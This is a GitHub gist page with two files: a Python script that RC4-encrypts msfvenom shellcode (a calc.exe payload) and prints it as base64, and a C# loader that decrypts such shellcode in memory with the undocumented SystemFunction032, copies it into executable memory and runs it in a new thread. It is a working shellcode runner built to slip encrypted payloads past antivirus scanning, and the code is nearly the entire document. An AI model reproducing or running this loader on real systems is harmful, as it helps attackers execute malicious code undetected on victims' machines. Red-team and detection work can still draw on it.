Skip to content

Instantly share code, notes, and snippets.

@snovvcrash

snovvcrash/RunShellcodeRC4.cs Secret

Last active December 29, 2022 20:11
Show Gist options
  • Star 13 You must be signed in to star a gist
  • Fork 6 You must be signed in to fork a gist
  • Save snovvcrash/3533d950be2d96cf52131e8393794d99 to your computer and use it in GitHub Desktop.
Save snovvcrash/3533d950be2d96cf52131e8393794d99 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
rc4_encrypt.py
#!/usr/bin/env python3
from typing import Iterator
from base64 import b64encode
# Stolen from: https://gist.github.com/hsauers5/491f9dde975f1eaa97103427eda50071
def key_scheduling(key: bytes) -> list[int]:
sched = [i for i in range(0, 256)]
i = 0
for j in range(0, 256):
i = (i + sched[j] + key[j % len(key)]) % 256
tmp = sched[j]
sched[j] = sched[i]
sched[i] = tmp
return sched
def stream_generation(sched: list[int]) -> Iterator[bytes]:
i, j = 0, 0
while True:
i = (1 + i) % 256
j = (sched[i] + j) % 256
tmp = sched[j]
sched[j] = sched[i]
sched[i] = tmp
yield sched[(sched[i] + sched[j]) % 256]
def encrypt(plaintext: bytes, key: bytes) -> bytes:
sched = key_scheduling(key)
key_stream = stream_generation(sched)
ciphertext = b''
for char in plaintext:
enc = char ^ next(key_stream)
ciphertext += bytes([enc])
return ciphertext
if __name__ == '__main__':
# msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin
with open('calc.bin', 'rb') as f:
result = encrypt(plaintext=f.read(), key=b'aaaaaaaaaaaaaaaa')
print(b64encode(result).decode())
Raw
RunShellcodeRC4.cs
using System;
using System.Text;
using System.Runtime.InteropServices;
namespace RunShellcodeRC4
{
public class Program
{
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll")]
static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);
[DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = false, EntryPoint = "SystemFunction032")]
static extern int SystemFunction032(ref CRYPTO_BUFFER data, ref CRYPTO_BUFFER key);
[StructLayout(LayoutKind.Sequential)]
struct CRYPTO_BUFFER
{
public uint Length;
public uint MaximumLength;
public IntPtr Buffer;
}
// Stolen from: https://github.com/vletoux/MakeMeEnterpriseAdmin/blob/0e3dcfd55be8ac5fde1631d0f50753a761927082/MakeMeEnterpriseAdmin.ps1#L98-L125
static int RtlEncryptDecryptRC4(IntPtr input, byte[] key, int lengh)
{
CRYPTO_BUFFER dataBuffer = new CRYPTO_BUFFER();
dataBuffer.Length = dataBuffer.MaximumLength = (uint)lengh;
dataBuffer.Buffer = input;
CRYPTO_BUFFER keyBuffer = new CRYPTO_BUFFER();
keyBuffer.Length = keyBuffer.MaximumLength = (uint)key.Length;
keyBuffer.Buffer = Marshal.AllocHGlobal(key.Length);
Marshal.Copy(key, 0, keyBuffer.Buffer, key.Length);
int ret = SystemFunction032(ref dataBuffer, ref keyBuffer);
Marshal.FreeHGlobal(keyBuffer.Buffer);
return ret;
}
public static void Main()
{
var key = Encoding.UTF8.GetBytes("aaaaaaaaaaaaaaaa");
var buf = Convert.FromBase64String("");
IntPtr alloc = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
Marshal.Copy(buf, 0, alloc, buf.Length);
_ = RtlEncryptDecryptRC4(alloc, key, buf.Length);
IntPtr hThread = CreateThread(IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, IntPtr.Zero);
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment